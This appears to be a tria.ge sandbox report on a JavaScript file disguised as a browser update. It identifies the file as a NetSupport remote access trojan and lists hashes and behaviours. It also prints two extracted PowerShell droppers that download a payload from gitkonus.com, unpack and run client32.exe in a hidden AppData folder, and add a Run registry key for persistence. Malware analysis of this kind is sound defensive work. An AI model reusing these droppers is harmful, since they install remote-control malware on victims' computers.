Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

16042024_2...107.js

windows7-x64

10

16042024_2...107.js

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    16042024_2042_Update_123.0.6312.107.js

  • Size

    16.0MB

  • Sample

    240416-pyb64sae72

  • MD5

    247bb3685fe1544f0f899f8df2db38cd

  • SHA1

    6f6d97f854c901f2d32ad81df6c62ce5e6c4a25a

  • SHA256

    be84be78a5ff8b06efa417f9a69b0eceafbe07bd2e61db88c4bac5757e38b5df

  • SHA512

    98970cc7d0d46d1042bb7b2c3f531954e9140a9ee97fbe987779979b996a1501203c1c8cebec6bf7a5880cd56b8c77330e2ebc1c59b152377e1331b6f239c867

  • SSDEEP

    49152:f7V7zjCxbzqHlp4LhyN0kghDzLZzjYzYsmCW+8z2V35//9SGGqHm3quVIKXgxcEc:O

Score
10/10
netsupportpersistencerat

Malware Config

Extracted

Language
ps1
Source
1
$mvrufwdINvjaBX='https://gitkonus.com/data.php?14743';$mKNsLAVABTiEBixU=(New-Object System.Net.WebClient).DownloadString($mvrufwdINvjaBX);$IDWpXBSkLjdaKcBFjAcZeIhDuPJlbG=[System.Convert]::FromBase64String($mKNsLAVABTiEBixU);$zxc = Get-Random -Minimum -10 -Maximum 37; $sFGXXZSceCFKjSbyNLbwKQxPDPgN=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN -PathType Container)) { New-Item -Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN -ItemType Directory };$p=Join-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN 'BB.zip';[System.IO.File]::WriteAllBytes($p,$IDWpXBSkLjdaKcBFjAcZeIhDuPJlbG);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$sFGXXZSceCFKjSbyNLbwKQxPDPgN)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $sFGXXZSceCFKjSbyNLbwKQxPDPgN -Force; $AZ.attributes='Hidden';$s=$sFGXXZSceCFKjSbyNLbwKQxPDPgN+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
URLs
ps1.dropper

https://gitkonus.com/data.php?14743
exe.dropper

https://gitkonus.com/data.php?14743

Extracted

Language
ps1
Source
1
$GisllGHetRbgcxJDohrnQlSu='https://gitkonus.com/data.php?13475';$cJXOKbiGzcZLwzYMkm=(New-Object System.Net.WebClient).DownloadString($GisllGHetRbgcxJDohrnQlSu);$WINfoGTtEnOrLodz=[System.Convert]::FromBase64String($cJXOKbiGzcZLwzYMkm);$zxc = Get-Random -Minimum -10 -Maximum 37; $sdbsbMLDhyAhBtjBE=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $sdbsbMLDhyAhBtjBE -PathType Container)) { New-Item -Path $sdbsbMLDhyAhBtjBE -ItemType Directory };$p=Join-Path $sdbsbMLDhyAhBtjBE 'BB.zip';[System.IO.File]::WriteAllBytes($p,$WINfoGTtEnOrLodz);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$sdbsbMLDhyAhBtjBE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $sdbsbMLDhyAhBtjBE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $sdbsbMLDhyAhBtjBE -Force; $AZ.attributes='Hidden';$s=$sdbsbMLDhyAhBtjBE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
URLs
ps1.dropper

https://gitkonus.com/data.php?13475
exe.dropper

https://gitkonus.com/data.php?13475

Targets

    • Target

      16042024_2042_Update_123.0.6312.107.js

    • Size

      16.0MB

    • MD5

      247bb3685fe1544f0f899f8df2db38cd

    • SHA1

      6f6d97f854c901f2d32ad81df6c62ce5e6c4a25a

    • SHA256

      be84be78a5ff8b06efa417f9a69b0eceafbe07bd2e61db88c4bac5757e38b5df

    • SHA512

      98970cc7d0d46d1042bb7b2c3f531954e9140a9ee97fbe987779979b996a1501203c1c8cebec6bf7a5880cd56b8c77330e2ebc1c59b152377e1331b6f239c867

    • SSDEEP

      49152:f7V7zjCxbzqHlp4LhyN0kghDzLZzjYzYsmCW+8z2V35//9SGGqHm3quVIKXgxcEc:O

    Score
    10/10
    netsupportpersistencerat

    • NetSupport

      NetSupport is a remote access tool sold as a legitimate system administration software.

      ratnetsupport

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.